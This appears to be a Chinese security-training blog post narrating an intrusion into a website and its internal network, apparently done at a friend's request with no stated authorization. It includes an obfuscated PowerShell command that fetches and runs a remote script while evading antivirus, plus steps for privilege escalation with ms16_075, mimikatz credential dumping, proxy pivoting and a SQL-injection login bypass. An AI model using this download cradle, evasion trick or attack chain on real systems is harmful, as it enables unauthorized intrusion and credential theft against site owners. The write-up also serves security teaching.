高质量的安全文章，安全offer面试经验分享

尽在 # 掌控安全EDU #

0x00前言

这天学弟hu5k7来找我叫我帮他getshell

0x01 Getshell

先登上后台看看先

yunsee查看一下 iis8.5不存在解析漏洞

翻后台找到了一个可以上传html的点，没什么用

后台放弃

扫描目录发现网站备份源码

其中web.config 有账号密码，暂时没用，留着

看了一下源码没发现什么地方可以利用，准备放弃了，这时候学弟说有sql注入

那就上sqlmap —os-shell 看看吧

普通的权限，上cs操作

powershell -w hidden -NoExit "$c1='IEX(New-ObjectNet.WebClient).Downlo';$c2='123(''http://xxxxx/bypass_test.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

这段ps代码简单混淆了一下，不加-w hidden可以过杀软

我这的bypass_test.ps1经过了免杀了

（ps免杀的工具，以前APT组织也有在用）

https://github.com/danielbohannon/Invoke-Obfuscation

0x02 提权

cs上线了，先看看系统补丁

240个补丁，我吐了，各种exp都没用

上msf用local_exploit_suggester 让它扫一下看看有没有可以用的漏洞。

这里直接用cs可以spwn给msf 先去监听那里新建一个

这里要用foreign 然后host用msf的ip，端口就msf监听的端口 我这边直接监听778

然后去msf choose选择刚刚新建的监听

这边msf成功上线，然后用local_exploit_suggester扫描一下

扫出了ms16_075，调用试一下

成功返回session，getuid查看一下

0x03 读取密码

直接SYSTEM，拿下，上mimikatz读取一下密码

这里发现读取不到，这里是因为2012 R2以上时

默认禁止在内存缓存中保存明文密码，但是读到了hash

0x04 内网渗透

本来是不打算接着操作的，但是想着都到这步了，就看看吧

之前看过不存在域。先用cs弄socks代理

然后用socksCap64来添加代理

然后测试一下连通性

ok通了，查看一下ip然后扫一下内网服务

子网掩码是255.255.255.240 那就是172.16.0.1/20
我这里用御剑的端口扫描，线程不能开太高容易死，就扫80端口先(要在刚刚的sockscap64里面添加然后在里面运行才行)

扫出来了很多的80，导出来之后用test404的title获取

来获取一下网站的标题再来选目标

看到了一个管理系统，然后去firefox打开用代理设置一下

设置好之后就可以去访问了

可以看到是个登陆的页面，可以尝试一下弱口令

错误，但是发现了是thinkphp的框架，尝试使用rce

rce尝试无果，发现是phpstudy，尝试phpmyadmin发现不存在

尝试使用phpstudy rce

rce无果，尝试注入吧

存在注入，尝试万能密码 admin’ #

直接进来了，后面getshell没法绕过上传，放弃了，内网就到这吧，其他就不弄了

0x05 总结

之前提权弄了半天都没弄下来，然后找了位表哥帮忙提权了，感谢橘子表哥。

(其实之前就想到过要用这个扫描，但是懒得传msf，果然就是懒限制了我的操作)

内网思路的一些分享：注入登录的验证码是可以重复使用的，在不存在注入的情况下，其实可以爆破的。

内网渗透发现不存在域就扫一下内网其他机器的常见端口80,445,1433,3306,3389,6379等常见的端口，然后再进行渗透。

回顾往期内容

面试经验分享 — 安恒、安垚、端御#附面试题、心得

新时代的渗透思路！微服务下的信息搜集

反杀黑客 — 还敢连shell吗？蚁剑RCE第二回合~

防溯源防水表—APT渗透攻击红队行动保障

实战纪实 | 从编辑器漏洞到拿下域控300台权限

 扫码加助教老师

可领取免费的安全教程

 还有免费的配套靶场、交流群哦！

---

                           点击在看~好文推荐大家一起看！👇

原文始发于微信公众号（掌控安全EDU）：一次从注入拿到系统权限+内网渗透